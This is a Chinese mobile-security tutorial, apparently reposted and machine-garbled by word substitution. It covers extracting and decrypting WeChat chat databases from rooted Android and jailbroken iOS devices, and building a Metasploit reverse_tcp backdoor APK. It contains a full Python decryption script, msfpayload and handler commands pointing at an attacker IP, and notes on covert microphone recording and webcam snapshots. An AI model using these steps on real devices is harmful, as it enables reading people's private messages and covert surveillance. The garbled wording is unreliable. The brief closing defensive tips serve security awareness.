? ?在这篇文章中我们将根究若何获得安卓、苹果配备中的微信谈天记载,并演示若何独霸后门颠末Metasploit对安卓配备终了管束。文章对照根蒂、可脱手性强,有配备的童鞋不妨边浏览文章边垄断,指望能激发自身对移动终端的平安趣味。
Default1 | “若何获得android、iPhone手机上的微信谈天记载? ” |
安卓配备已获得root权限,安顿SSHDroid(颠末ssh、ftp毗连办机)
Apple配备逃狱,安顿OpenSSH插件
不少安卓手机的用户都会碰着这么一个尴尬的标题问题:手机用久了就人不知;鬼不觉变得慢了,末端慢到甚么都敏感了。为了设计这个标题问题和大多数人同样我选择了root配备。
安卓配备在root当前可能对零碎文件具备最低级别的垄断权限。例如,你在安卓配备上安顿了微信,那末root当前颠末adb shell你能对微信App的文件配置终了读取批改等垄断。
Android操纵步伐的数据库文件通常会保具备 /data/data/packagename/database 文件夹下,微信App文件存放阶梯为:/data/data/com.tencent.mm/MicroMsg
起首颠末FTP把文件down到本地:
以34位编码(近似于乱码)定名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db
用数据库筹画器关上:提醒加密或者不是数据库文件
Android操纵步伐的数据库文件通常会保具备 /data/data/packagename/database 文件夹下,微信App文件存放阶梯为:/data/data/com.tencent.mm/MicroMsg
起首颠末FTP把文件down到本地:
以34位编码(近似于乱码)定名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db
用数据库筹画器关上:提醒加密或者不是数据库文件
这里可能用Windows环境下的SQLite Database Browser浏览器关上:
提醒输入暗码:
1 | <int name="default_uin" value="http://www.freebuf.com/articles/terminal/146奸淫*21" /> |
颠末上述两种法子找到的uin值是雷同的。
安卓拨号界面输入*#06#得到手机IMEI码:354奸淫*奸淫***85
SIM值+uin值组合即为146奸淫*21354奸淫*奸淫***85
md5: ?http://www.spriteking.com/cmd5/??右边加密
得到32位小写md5值:a1edf9f5奸淫*奸淫*奸淫*奸淫*奸淫*b5e5 取其前七位:a1edf9f输入到sql浏览器中。
linux、Mac用户也可能在终端执行:
Default12 | echo -n "146奸淫*21354奸淫*奸淫***85" | md5sum | cut -c -7 |
靡烂关上微信的数据库文件:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187 | import osimport sysimport reimport hashlibimport csvimport timeimport localeimport getopt def get_db(): os.popen('adb root').close() text = os.popen( 'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read() return text.splitlines()[- 1] if text else '' def get_default_uin(): os.popen('adb root').close() text = os.popen( 'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read() default_uin = re.findall( 'name="default_uin" value="http://www.freebuf.com/articles/terminal/([0-9]+)"', text) return default_uin[0] if default_uin else 0 def get_device_ID(): text = os.popen('adb shell dumpsys iphonesubinfo').read() device_ID = re.findall('Device ID = ([0-9]+)', text) return device_ID[0] if device_ID else 0 def get_md5(): default_uin = get_default_uin() device_ID = get_device_ID() if default_uin and device_ID: return hashlib.md5(device_ID + default_uin).hexdigest()[0: 7] return '' def parse_msgcsv(msgcsv): locale.setlocale(locale.LC_ALL, '') if hasattr(msgcsv, 'title'): msgcsv = [ooOoo0O + '\n' for ooOoo0O in msgcsv.splitlines()] pass OooO0 = csv.reader(msgcsv) OooO0.next() for ooOoo0O in OooO0: try: II11iiii1Ii, OO0o, Ooo, O0o0Oo, Oo00OOOOO, O0O, O00o0OO, name, iIi1ii1I1, o0, I11II1i, IIIII = ooOoo0O[ : 12] pass except: continue ooooooO0oo = 'me' if (Oo00OOOOO == '1') else name IIiiiiiiIi1I1 = time.localtime(int(O00o0OO) / 1000) I1IIIii = time.strftime("%Y-%m-%d %a %H:%M:%S", IIiiiiiiIi1I1) yield [name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0] pass pass def get_names(chat): names = {} for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat: names[name] = 1 pass return names.keys() def oo(chat, name=''): text = [] name = name.lower() for name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0 in chat: iIi1ii1I1 = iIi1ii1I1.replace('\n', '\n ') o0 = ('\t' + o0) if o0 else '' if not name: text.append('%s: %s %s: %s %s' % (name, I1IIIii, ooooooO0oo, iIi1ii1I1, o0)) pass elif name.lower() == name: text.append('%s %s: %s %s' % (I1IIIii, ooooooO0oo, iIi1ii1I1, o0)) pass pass return '\n'.join(text) + '\n' def IIIii1II1II(dbn, key=''): child_stdin, child_stdout = os.popen2(['sqlcipher', dbn]) if key: child_stdin.write('PRAGMA key=%s;\n' % ` key `) child_stdin.write('pragma cipher_use_hmac=off;\n') pass child_stdin.write('.tables\n') child_stdin.close() return child_stdout.read().split() def decrypt(dbn, key='', table='message'): table = table or 'message' child_stdin, child_stdout = os.popen2(['sqlcipher', dbn]) child_stdin.write('.header on\n') child_stdin.write('.mode csv\n') if key: child_stdin.write('PRAGMA key=%s;\n' % ` key `) child_stdin.write('pragma cipher_use_hmac=off;\n') pass child_stdin.write('select * from %s;\n' % ` table `) child_stdin.close() return child_stdout.read() def wechat2txt(names=[]): in_file = 'EnMicroMsg.db' out_file = 'message.csv' db = get_db() md5 = get_md5() os.popen('adb wait-for-device') os.popen('adb pull %s %s' % (db, in_file)).close() msgcsv = decrypt(in_file, md5) if msgcsv.find('\n') < 0: return 1 file(out_file, 'w').write(msgcsv) msgs = list(parse_msgcsv(msgcsv)) if not msgs: return 1 if not names: names = get_names(msgs) pass for name in names: filename = 'message.%s.txt' % name text = oo(msgs, name) if len(text) > 4: file(filename, 'w').write(text) pass pass pass help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]... OPTIONS: -h display this help and exit''' def main(): try: opts, args = getopt.getopt(sys.argv[1:], 'h') except getopt.error, e: print help_msg return 1 for opt, arg in opts: if opt == '-h': print help_msg return 1 pass names = args text = wechat2txt(names) return not text if __name__ == "__main__": sys.exit(main()) |
Apple配备逃狱后可颠末Cydia安顿各类小插件,通常情况我会安顿OpenSSH来使巨匠能颠末终端毗连到Apple配备中,并使用sftp传输文件:
iOS中,操纵文件夹以hash值定名,要导出微信、QQ的谈天记载其难度绝对安卓来讲稍微繁冗不少。
在理论垄断中我们可能颠末巧用Linux号令(find、grep、xargs)来绕过这些坑。
Default1234 | find /var/mobile/Containers/Data -name "MM.sqlite" mkdir /cachefind /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache |
在逃狱iOS窃取隐衷可参考:帮女神修手机的不测缔造:逃避在iOS文件零碎中的隐衷静态 一文
Kali Linux(Hack):192.168.31.213
Android(靶机):192.168.31.118
12 | cd Desktopmsfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk |
1234567 | msfconsole use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.31.213set LPORT 443run |
后门能终了甚么垄断?我们来看看usage:
Default1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283 | meterpreter > help Core commands============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands=========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: Webcam Commands======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds 站点cam_list List 站点cams 站点cam_snap Take a snapshot from the specified 站点cam |
1234 | record_mic 颠末手机麦克风终了窃听、录音;站点cam_list 列出安卓配备的局部摄像头;站点cam_snap 颠末摄像头终了偷拍…等等 |
把apk放到apk分析工具(apkStudio、Bytecodeviewer)终理解包,我们来看看后门App的源码:
(apkStudio)
在smali/com/metasploit/stage/MainActivity.smali中我们可能找到后门办事器的ip端口配置:
(apkStudio)
(Bytecodeviewer)
安卓:从可托来源下载操纵步伐,提防劝化歹意步伐;在移动充电桩充电前实时关闭USB调试。
苹果:逃狱后实时批改root暗码,提防使用默认暗码、弱口令。
SQLite Database Browser:http://pan.百度.com/s/1nuWlDgd
SSHDroid:http://pan.百度.com/s/1b6PBK6
How To Decrypt WeChat EnMicroMsg.db Database?
Android微信数据导出
微信谈天记载分析
A look at WeChat security
https://gist.github.com/scturtle/7248017
帮女神修手机的不测缔造:逃避在iOS文件零碎中的隐衷静态
Hacking Android Smartphone Tutorial using Metasploit
[via@雪碧0xroot@漏洞盒子平安团队]